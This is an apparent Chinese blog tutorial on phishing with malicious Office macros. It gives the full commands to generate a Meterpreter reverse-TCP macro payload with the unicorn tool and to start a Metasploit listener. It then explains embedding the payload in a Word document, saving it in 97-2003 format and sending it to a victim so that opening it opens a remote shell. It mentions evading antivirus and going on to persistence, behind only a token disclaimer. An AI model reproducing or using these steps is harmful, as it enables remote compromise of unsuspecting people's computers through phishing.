标签:msf bsp git clone 帮助信息 xpl windows txt 受害者 文档
背景:
最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。
常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。
那么今天主要利用Windows office 宏进行远程攻击。
环境:
kail Linux 2018 xface
Windows 10 home office 2016
直接上操作:
kail linux
# git clone https://github.com/trustedsec/unicorn.git
此工具使用具体看帮助信息,这里不多说明,也可以去Git上查看
生成payload:
# python unicorn.py windows/meterpreter/reverse_tcp 1.1.1.1 4444 macro
会生成:
powershell_attack.txt #office宏payload
unicorn.rc #msf使用
两个文件
启动msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j
靶机Windows10 主机上生成带有宏病毒的office Word文档
记得打开开发者选项,输入正文内容
点击宏,输入宏名称,然后点击新建
这里将生成的payload 复制进去
然后点击保存,导出文档为97-2003 文档格式
将文档发给受害者,打开文档就直接上线。
okay msf这边已经上线
在这里可能有人可能会问题,那报毒怎么办,那么我杀毒检测看看,看看稳不稳:
后面就是进程迁移,后持续渗透,内网深入渗透了。。。。
请勿使用非法用途,否则后果自负。。。。。
备注:生成的payload需要修改下,否则会导致不运行或者运行完成后退出。。。。
标签:msf bsp git clone 帮助信息 xpl windows txt 受害者 文档
原文地址:https://www.cnblogs.com/hack404/p/11876059.html